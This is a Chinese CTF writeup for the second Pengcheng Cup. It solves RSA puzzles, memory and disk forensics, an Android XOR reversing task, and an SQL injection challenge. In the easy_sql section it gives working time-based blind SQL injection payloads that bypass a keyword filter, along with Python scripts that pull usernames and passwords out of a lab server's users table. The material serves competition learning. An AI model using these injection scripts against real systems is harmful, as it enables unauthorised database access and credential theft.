第二届鹏城杯部分题目Writeup

2022-7-3 CTFWriteupWebMiscCryptoReverse

记录下第二届鹏城杯初赛部分赛题的Writeup

# easy_rsa

easy rsa 3 steps

import gmpy2
from Crypto.Util.number import *
import random
from secret import flag

m1 = flag[0:12]
m2 = flag[12:24]
m3 = flag[24:]

def encrypt1(m):
    while 1:
        e = random.randint(100, 1000)
        p = getPrime(1024)
        q = getPrime(1024)
        phi_n = (p - 1) * (q - 1)
        t = gmpy2.gcd(e, phi_n)
        if gmpy2.invert(e // t, phi_n) and t != 1:
            break
    n = p * q
    c = pow(m, e, n)
    print({'c': format(c, 'x'), 'p': format(p, 'x'), 'q': format(q, 'x'), 'e': format(e, 'x')})


def encrypt2(m):
    p = getPrime(1024)
    q = getPrime(1024)
    n = p * q
    e = 65537
    c = gmpy2.powmod(m, e, n)
    print({'c': format(c, 'x'), 'p': format((p >> 60) << 60, 'x'), 'e': format(e, 'x'), 'n': format(n, 'x')})


def encrypt3(m):
    p = getPrime(1024)
    q = getPrime(1024)
    n = p * q
    e = 65537
    M = 2022 * m * 1011 * p
    c = pow(M, e, n)
    print({'c': format(c, 'x'), 'n': format(n, 'x'),'e':format(e, 'x')})


if __name__ == '__main__':
    encrypt1(bytes_to_long(m1))
    encrypt2(bytes_to_long(m2))
    encrypt3(bytes_to_long(m3))

# {'c': '27455f081e4858790c6503580dad3302ae359c9fb46dc601eee98f05142128404e95377324720adbbdebf428549008bcd1b670f6749592a171b30316ab707004b9999f3b80de32843afdfd30505b1f4166a03cee9fc48902b74b6e850cfd268e6917c5d84e64f7e7cd0e4a30bfe5903fb5d821d27fdc817d9c4536a8e7aea55af266abcae857a8ffff2f741901baba1b44091a137c69c471c123ab0b80e250e055959c468e6e37c005105ecd7c8b48c659024e5e251df3eeff5da7b3d561cd98150da3575a16bee5f2524d2795fd4879487018345c1e96efc085ed45fb5f02c027aee5bca3aad0eb3e23376c0cd18b02fb05a1ff8fb1af0a3ce4bb671599894e', 'p': 'bb602e402b68a5cfcc5cfcc63cc82e362e98cb7043817e3421599a4bb8755777c362813742852dad4fec7ec33f1faec04926f0c253f56ab4c4dde6d71627fbc9ef42425b70e5ecd55314e744aa66653103b7d1ba86d1e0e21920a0bfe7d598bd09c3c377a3268928b953005450857c6cfea5bfdd7c16305baed0f0a31ad688bd', 'q': 'bb8d1ea24a3462ae6ec28e79f96a95770d726144afc95ffffa19c7c3a3786a6acc3309820ba7b1a28a4f111082e69e558b27405613e115139b38e799c723ab7fdd7be14b330b118ae60e3b44483a4c94a556e810ab94bbb102286d0100d7c20e7494e20e0c1030e016603bd2a06c1f6e92998ab68e2d420faf47f3ee687fb6d1', 'e': '292'}
# {'c': '3a80caebcee814e74a9d3d81b08b1130bed6edde2c0161799e1116ab837424fbc1a234b9765edfc47a9d634e1868105d4458c9b9a0d399b870adbaa2337ac62940ade08daa8a7492cdedf854d4d3a05705db3651211a1ec623a10bd60596e891ccc7b9364fbf2e306404aa2392f5598694dec0b8f7efc66e94e3f8a6f372d833941a2235ebf2fc77c163abcac274836380045b63cc9904d9b13c0935040eda6462b99dd01e8230fdfe2871124306e7bca5b356d16796351db37ec4e574137c926a4e07a2bfe76b9cbbfa4b5b010d678804df3e2f23b4ec42b8c8433fa4811bf1dc231855bea4225683529fad54a9b539fe824931b4fdafab67034e57338217f', 'p': 'a9cb9e2eb43f17ad6734356db18ad744600d0c19449fc62b25db7291f24c480217d60a7f87252d890b97a38cc6943740ac344233446eea4084c1ba7ea5b7cf2399d42650b2a3f0302bab81295abfd7cacf248de62d3c63482c5ea8ab6b25cdbebc83eae855c1d07a8cf0408c2b721e43c4ac53262bf9aaf7a000000000000000', 'e': '10001', 'n': '841a5a012c104e600eca17b451d5fd37c063ad347707a2e88f36a07e9ad4687302790466e99f35b11580cbe8b0a212e6709686c464a6393c5895b1f97885f23ea12d2069eb6dc3cb4199fb8c6e80a4a94561c6c3499c3c02d9dc9cf216c0f44dc91701a6d9ec89981f261a139500420a51014492f1da588a26e761439dd5739b32540ca6dc1ec3b035043bc535304a06ccb489f72fcd1aa856e1cffe195039176937f9a16bd19030d1e00095f1fd977cf4f23e47b55650ca4712d1eb089d92df032e5180d05311c938a44decc6070cd01af4c6144cdab2526e5cb919a1828bec6a4f3332bf1fa4f1c9d3516fbb158fd4fbcf8b0e67eff944efa97f5b24f9aa65'}
# {'c': '1bd2a47a5d275ba6356e1e2bd10d6c870693be540e9318c746e807a7672f3a75cc63841170126d7dba52d7f6f9cf0f8dce9705fc1785cc670b2658b05d4b24d8918f95594844bfa920c8ffe73160c2c313b3fdbc4541ec19828165e34afa7d05271cc6fd59d08138b88c11677e6ac3b39cff525dcb19694b0388d895f53805a5e5bd8cfb947080e4855aaf83ebd85a397526f7d76d26031386900cb44a2e4bd121412bcee7a6c1e9af411e234f130e68a428596265d3ec647e50f65cb81393f4bd38389a2b9010fd715582506b9054dc235aced50757462b77a5606f116853af0c1ea3c7cf0d304f885d86081f8bac8b67b0625122f75448c5b6eb8f1cc8a0df', 'n': 'c2b17c86a8950f6dafe0a633890e4271cfb20c5ffda2d6b3d035afa655ed05ec16c67b18832ed887f2cea83056af079cc75c2ce43c90cce3ed02c2e07d256f240344f1734adeee6dc2b3b4bbf6dcfc68518d0a74e3e66f1865db95ef4204457e6471903c2321ac97f3b8e3d8d935896e9fc9145a30a3e24e7c320490a9944c1e94d301c8388445532699e6189f4aa6a86f67f1d9b8fb0de4225e005bd27594cd33e36622b2cd8eb2781f0c24d33267d9f29309158942b681aab81f39d1b4a73bd17431b46a89a0e4c2c58b1e24e850355c63b72392600d3fff7a16f6ef80ea515709da3ef1d28782882b0dd2f76bf609590db31979c5d1fd03f75d9d8f1c5069', 'e': '10001'}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50

flag分为三部分,需要分别求出

第一部分中,t = gmpy2.gcd(e, phi_n)t!=1,所以 不互质,所以不能直接求出逆元 ,只有当他们互质时,才能保证 的逆元 唯一存在。而 是互质的,则

计算 关于 的逆元即可算出 ,然后求出 ,之后开 次方即可

import gmpy2
from Crypto.Util.number import *

dic = {'c': '27455f081e4858790c6503580dad3302ae359c9fb46dc601eee98f05142128404e95377324720adbbdebf428549008bcd1b670f6749592a171b30316ab707004b9999f3b80de32843afdfd30505b1f4166a03cee9fc48902b74b6e850cfd268e6917c5d84e64f7e7cd0e4a30bfe5903fb5d821d27fdc817d9c4536a8e7aea55af266abcae857a8ffff2f741901baba1b44091a137c69c471c123ab0b80e250e055959c468e6e37c005105ecd7c8b48c659024e5e251df3eeff5da7b3d561cd98150da3575a16bee5f2524d2795fd4879487018345c1e96efc085ed45fb5f02c027aee5bca3aad0eb3e23376c0cd18b02fb05a1ff8fb1af0a3ce4bb671599894e', 'p': 'bb602e402b68a5cfcc5cfcc63cc82e362e98cb7043817e3421599a4bb8755777c362813742852dad4fec7ec33f1faec04926f0c253f56ab4c4dde6d71627fbc9ef42425b70e5ecd55314e744aa66653103b7d1ba86d1e0e21920a0bfe7d598bd09c3c377a3268928b953005450857c6cfea5bfdd7c16305baed0f0a31ad688bd', 'q': 'bb8d1ea24a3462ae6ec28e79f96a95770d726144afc95ffffa19c7c3a3786a6acc3309820ba7b1a28a4f111082e69e558b27405613e115139b38e799c723ab7fdd7be14b330b118ae60e3b44483a4c94a556e810ab94bbb102286d0100d7c20e7494e20e0c1030e016603bd2a06c1f6e92998ab68e2d420faf47f3ee687fb6d1', 'e': '292'}
c = int(dic['c'], 16)
e = int(dic['e'], 16)
p = int(dic['p'], 16)
q = int(dic['q'], 16)

n = p * q
phi = (p - 1) * (q - 1)
t = gmpy2.gcd(e, phi)
d = gmpy2.invert(e // t, phi)
m = pow(c, d, n)
m = gmpy2.iroot(m, t)[0]
print(long_to_bytes(m))

# b'PCL{16745c3b'
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18

第二部分中,已知p的高位,使用sage在线网站求出p和q即可

# # sage: https://sagecell.sagemath.org/
# n = 0x841a5a012c104e600eca17b451d5fd37c063ad347707a2e88f36a07e9ad4687302790466e99f35b11580cbe8b0a212e6709686c464a6393c5895b1f97885f23ea12d2069eb6dc3cb4199fb8c6e80a4a94561c6c3499c3c02d9dc9cf216c0f44dc91701a6d9ec89981f261a139500420a51014492f1da588a26e761439dd5739b32540ca6dc1ec3b035043bc535304a06ccb489f72fcd1aa856e1cffe195039176937f9a16bd19030d1e00095f1fd977cf4f23e47b55650ca4712d1eb089d92df032e5180d05311c938a44decc6070cd01af4c6144cdab2526e5cb919a1828bec6a4f3332bf1fa4f1c9d3516fbb158fd4fbcf8b0e67eff944efa97f5b24f9aa65
# high_p = 0xa9cb9e2eb43f17ad6734356db18ad744600d0c19449fc62b25db7291f24c480217d60a7f87252d890b97a38cc6943740ac344233446eea4084c1ba7ea5b7cf2399d42650b2a3f0302bab81295abfd7cacf248de62d3c63482c5ea8ab6b25cdbebc83eae855c1d07a8cf0408c2b721e43c4ac53262bf9aaf7a000000000000000

# R.<x> = PolynomialRing(Zmod(n), implementation='NTL')
# p = high_p + x
# x0 = p.small_roots(X = 2^60, beta = 0.1)[0]

# P = int(p(x0))
# Q = n // P
# assert n == P*Q
# print(P)
# print(Q)

import gmpy2
from Crypto.Util.number import *

dic = {'c': '3a80caebcee814e74a9d3d81b08b1130bed6edde2c0161799e1116ab837424fbc1a234b9765edfc47a9d634e1868105d4458c9b9a0d399b870adbaa2337ac62940ade08daa8a7492cdedf854d4d3a05705db3651211a1ec623a10bd60596e891ccc7b9364fbf2e306404aa2392f5598694dec0b8f7efc66e94e3f8a6f372d833941a2235ebf2fc77c163abcac274836380045b63cc9904d9b13c0935040eda6462b99dd01e8230fdfe2871124306e7bca5b356d16796351db37ec4e574137c926a4e07a2bfe76b9cbbfa4b5b010d678804df3e2f23b4ec42b8c8433fa4811bf1dc231855bea4225683529fad54a9b539fe824931b4fdafab67034e57338217f', 'p': 'a9cb9e2eb43f17ad6734356db18ad744600d0c19449fc62b25db7291f24c480217d60a7f87252d890b97a38cc6943740ac344233446eea4084c1ba7ea5b7cf2399d42650b2a3f0302bab81295abfd7cacf248de62d3c63482c5ea8ab6b25cdbebc83eae855c1d07a8cf0408c2b721e43c4ac53262bf9aaf7a000000000000000', 'e': '10001', 'n': '841a5a012c104e600eca17b451d5fd37c063ad347707a2e88f36a07e9ad4687302790466e99f35b11580cbe8b0a212e6709686c464a6393c5895b1f97885f23ea12d2069eb6dc3cb4199fb8c6e80a4a94561c6c3499c3c02d9dc9cf216c0f44dc91701a6d9ec89981f261a139500420a51014492f1da588a26e761439dd5739b32540ca6dc1ec3b035043bc535304a06ccb489f72fcd1aa856e1cffe195039176937f9a16bd19030d1e00095f1fd977cf4f23e47b55650ca4712d1eb089d92df032e5180d05311c938a44decc6070cd01af4c6144cdab2526e5cb919a1828bec6a4f3332bf1fa4f1c9d3516fbb158fd4fbcf8b0e67eff944efa97f5b24f9aa65'}
c = int(dic['c'], 16)
n = int(dic['n'], 16)
e = int(dic['e'], 16)

p = 119234372387564173916926418564504307771905987823894721284221707768770334474240277144999791051191061404002537779694672314673997030282474914206610847346023297970473719280866108677835517943804329212840618914863288766846702119011361533150365876285203805100986025166317939702179911918098037294325448226481818486521
q = 139862779248852876780236838155351435339041528333485708458669785004897778564234874018135441729896017420539905517964705602836874055417791439544162777504181482765029478481701166935117795286988835104239238153206137155845327225155932803904032184502243017645538314995056944419185855910939481260886933456330514972109
phi = (p-1)*(q-1)
d = gmpy2.invert(e, phi)
m = pow(c, d, n)
print(long_to_bytes(m))

# b'0c134c83b74f'
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30

第三部分中

由此可知, 的倍数,而 也是 的倍数,所以求 的最大公因数即可求出 ,之后求出 ,然后即可求出

import gmpy2
from Crypto.Util.number import *

dic = {'c': '1bd2a47a5d275ba6356e1e2bd10d6c870693be540e9318c746e807a7672f3a75cc63841170126d7dba52d7f6f9cf0f8dce9705fc1785cc670b2658b05d4b24d8918f95594844bfa920c8ffe73160c2c313b3fdbc4541ec19828165e34afa7d05271cc6fd59d08138b88c11677e6ac3b39cff525dcb19694b0388d895f53805a5e5bd8cfb947080e4855aaf83ebd85a397526f7d76d26031386900cb44a2e4bd121412bcee7a6c1e9af411e234f130e68a428596265d3ec647e50f65cb81393f4bd38389a2b9010fd715582506b9054dc235aced50757462b77a5606f116853af0c1ea3c7cf0d304f885d86081f8bac8b67b0625122f75448c5b6eb8f1cc8a0df', 'n': 'c2b17c86a8950f6dafe0a633890e4271cfb20c5ffda2d6b3d035afa655ed05ec16c67b18832ed887f2cea83056af079cc75c2ce43c90cce3ed02c2e07d256f240344f1734adeee6dc2b3b4bbf6dcfc68518d0a74e3e66f1865db95ef4204457e6471903c2321ac97f3b8e3d8d935896e9fc9145a30a3e24e7c320490a9944c1e94d301c8388445532699e6189f4aa6a86f67f1d9b8fb0de4225e005bd27594cd33e36622b2cd8eb2781f0c24d33267d9f29309158942b681aab81f39d1b4a73bd17431b46a89a0e4c2c58b1e24e850355c63b72392600d3fff7a16f6ef80ea515709da3ef1d28782882b0dd2f76bf609590db31979c5d1fd03f75d9d8f1c5069', 'e': '10001'}

c = int(dic['c'], 16)
n = int(dic['n'], 16)
e = int(dic['e'], 16)

p = gmpy2.gcd(n, c)
q = n//p
phi = (p-1)*(q-1)
d = gmpy2.invert(e, phi)
M = pow(c, d, n)
m = M // 2022 // 1011 // p
print(long_to_bytes(m))

# b'977260aae9b5}'
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18

将三部分合在一起即可得到flag

PCL{16745c3b0c134c83b74f977260aae9b5}
1

# babyrsa

flag提交格式为PCL{XXXXXX},修改前缀后提交

from Crypto.Util.number import *
from libnum import s2n
from secret import flag
p = getPrime(1024)
q = getPrime(16)
n = p*q
m = s2n(flag)
for i in range(1,p-q):
    m = m*i%n
e = 1049
print(pow(2,e,n))
print(pow(m,e,n))
#4513855932190587780512692251070948513905472536079140708186519998265613363916408288602023081671609336332823271976169443708346965729874135535872958782973382975364993581165018591335971709648749814573285241290480406050308656233944927823668976933579733318618949138978777831374262042028072274386196484449175052332019377
#3303523331971096467930886326777599963627226774247658707743111351666869650815726173155008595010291772118253071226982001526457616278548388482820628617705073304972902604395335278436888382882457685710065067829657299760804647364231959804889954665450340608878490911738748836150745677968305248021749608323124958372559270
1
2
3
4
5
6
7
8
9
10
11
12
13
14

由于c1 = pow(2, e, n),所以k*n = pow(2, e) - c1,且k*npow(2, e) - c1相近,直接爆破得到n。而q很小,同样直接爆破得到p和q,⽤威尔逊定理解出flag

from Crypto.Util.number import *
import gmpy2

e = 1049
c1 = 4513855932190587780512692251070948513905472536079140708186519998265613363916408288602023081671609336332823271976169443708346965729874135535872958782973382975364993581165018591335971709648749814573285241290480406050308656233944927823668976933579733318618949138978777831374262042028072274386196484449175052332019377
k_n = pow(2, e) - c1

# 爆破得到n
start = k_n // ((2**1024)*(2**16))
end = k_n // ((2**1023)*(2**15))
for k in range(start, end):
    if k_n%k == 0:
        n = k_n//k

# 爆破得到p和q
for q in range(2**15, 2**16):
    if isPrime(q):
        p = n//q
        if p*q == n:
            break

# 威尔逊定理
c = 3303523331971096467930886326777599963627226774247658707743111351666869650815726173155008595010291772118253071226982001526457616278548388482820628617705073304972902604395335278436888382882457685710065067829657299760804647364231959804889954665450340608878490911738748836150745677968305248021749608323124958372559270
phi = (p-1)*(q-1)
d = gmpy2.invert(e, phi)
M = pow(c, d, n)
for i in range(p-q, p):
    M = M*i%n
m=(-M)%p
print(long_to_bytes(m))
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30

所以flag为

PCL{7h3_73rr1b13_7h1ng_15_7h47_7h3_p457_c4n'7_b3_70rn_0u7_by_175_r0075}
1

# 简单取证

查看镜像信息

.\volatility.exe -f .\file.raw imageinfo
1

扫描内存中所有文件

.\volatility.exe -f .\file.raw --profile=WinXPSP2x86 filescan > filescan.txt
1

发现有个jpg图片

提取出来

.\volatility.exe -f .\file.raw --profile=WinXPSP2x86 dumpfiles -Q 0x0000000002325028 --dump-dir=./
1

用010editor打开后发现是base64编码,解码后翻转得到一个加密的zip压缩包

import base64
import struct

with open("secret.jpg", "r") as f:
    r = f.read()

lst = list(base64.b64decode(r))
lst.reverse()

with open("flag.zip", "wb") as f:
    for i in lst:
        s = struct.pack('B', i)
        f.write(s)
1
2
3
4
5
6
7
8
9
10
11
12
13

获取cmd输入的内容,找到密码

.\volatility.exe -f .\file.raw --profile=WinXPSP2x86 cmdscan
1

解压后是一些类似坐标的数字,猜测是一张二维码,用python写个脚本跑下

from PIL import Image

im = Image.new("RGB", (350, 350), (0, 0, 0))

with open("flag.txt", "r") as f:
    r = f.read()

lst = r.split("\n")
for i in lst:
    x = int(i.split(" ")[0])
    y = int(i.split(" ")[1])
    im.putpixel((x, y), (255, 255, 255))

im.save("flag.png")
1
2
3
4
5
6
7
8
9
10
11
12
13
14

PCL{a6b93e36-f097-11ec-a9b2-5254002d2b31}
1

# baby_re

jadx反汇编,发现是异或加密

但baby_xor()函数不知道,提取libcreateso.so,用ida分析,发现key

但也是用异或加密

用python写个脚本跑下

flag = [119, 9, 40, 44, 106, 83, 126, 123, 33, 87, 113, 123, 112, 93, 125, 127, 41, 82, 44, 127, 39, 3, 126, 125, 119, 87, 47, 125, 33, 6, 44, 127, 112, 0, 126, 123, 115, 24]

key = [0x56, 0x57, 0x58, 0x59]
hide_key = [0x47, 0x32, 0x11, 0x12]

for i in range(len(key)):
    key[i] ^= hide_key[i]

for i in range(len(flag)):
    print(chr(flag[i] ^ key[i%4]), end="")
1
2
3
4
5
6
7
8
9
10
PCL{6700280a84487e46f76f2f60ce4ae70b}
1

# easy_sql

登录就给flag

提示1:mysql版本有点高..。

提示2:听说有用户获取过flag

在User处用\闭合后面的引号,Pass处可以用测试ban了那些关键词,被ban的返回302,否则返回200

经过测试发现过滤了AND、HAVING、IF、LEFT、LIKE、SELECT、WHERE、REGEXP、RLIKE、SLEEP等关键词

sleep过滤了可以用benchmark代替,select过滤了可以用table代替,进行时间盲注,以下两条payload响应时间相差明显

立即响应
User=\&Pass= or case (1,binary"m","")<(table users limit 0,1) when "0" then benchmark(1000000000,SHA1("a")) else "a" end#

一段时间后响应
User=\&Pass= or case (1,binary"n","")<(table users limit 0,1) when "0" then benchmark(1000000000,SHA1("a")) else "a" end#
1
2
3
4
5

由此可以知道users表的username值的第一条记录的第一个字符为m,据此写个脚本跑下

import requests

url = "http://192.168.1.109/index.php"
tables = []
tables.append(chr(0x00))
for i in range(33, 127):
    tables.append(chr(i))

username = ""
while True:
    for i in range(len(tables)):
        payload = username + tables[i]
        data = {
            'User': '\\',
            'Pass': f' or case (1,binary"{payload}","")<(table users limit 0,1) when "0" then benchmark(1000000000,SHA1("a")) else "a" end#'
        }
        print(data['Pass'])
        try:
            r = requests.post(url=url, data=data, allow_redirects=False, timeout=3)
        except Exception as e:
            if i == 0:
                exit()
            username += tables[i-1]
            print(username)
            break
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25

所以用户名为me7eorite,修改下脚本跑下密码

import requests

url = "http://192.168.1.109/index.php"
tables = []
tables.append(chr(0x00))
tables.append(chr(33))
for i in range(36, 127):
    tables.append(chr(i))
tables.append(chr(0x00))

username = "me7eorite"
password = ""
while True:
    for i in range(len(tables)):
        payload = password + tables[i]
        data = {
            'User': '\\',
            'Pass': f' or case (1,"{username}",binary"{payload}")<(table users limit 0,1) when "0" then benchmark(1000000000,SHA1("a")) else "a" end#'
        }
        print(data['Pass'])
        try:
            r = requests.post(url=url, data=data, allow_redirects=False, timeout=3)
        except Exception as e:
            if i == 1:
                exit()
            password += tables[i-1]
            print(password)
            break
        if i == len(tables)-1:
            password = password[:-1] + tables[tables.index(password[-1]) + 1]
            print(password)
            exit()
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32

得到密码:me7eorite@Ctfer,登录发现没有flag,改下两个脚本,跑下别的用户的用户名和密码

第一个脚本,将

'Pass': f' or case (1,binary"{payload}","")<(table users limit 0,1) when "0" then benchmark(1000000000,SHA1("a")) else "a" end#'
1

改为

'Pass': f' or case (2,binary"{payload}","")<(table users limit 1,1) when "0" then benchmark(1000000000,SHA1("a")) else "a" end#'
1

第二个脚本,将

'Pass': f' or case (1,"{username}",binary"{payload}")<(table users limit 0,1) when "0" then benchmark(1000000000,SHA1("a")) else "a" end#'
1

改为

'Pass': f' or case (2,"{username}",binary"{payload}")<(table users limit 1,1) when "0" then benchmark(1000000000,SHA1("a")) else "a" end#'
1

得到用户名:Cha0s和密码:Cha0s_aaa_bbb_ccc,依然没有flag,继续改脚本重新跑,得到

User=SuperF1@g
Pass=F1@g_1N_Th1S_UsEr_Y0u_Ge7_P@ssW0rd!!!
1
2

登录进行即可拿到flag

PCL{31gx8q79oq85arei00ptoih514nw7f1a51s}
1

# babybit

用DiskGenius打开文件,恢复下,找到一个zip

解压后是备份的注册表文件,用MiTeCWindowsRegistryRecovery打开

找到加密的起止时间,根据题目要求得到flag

PCL{2022/6/13_15:17:39_2022/6/13_15:23:46}
1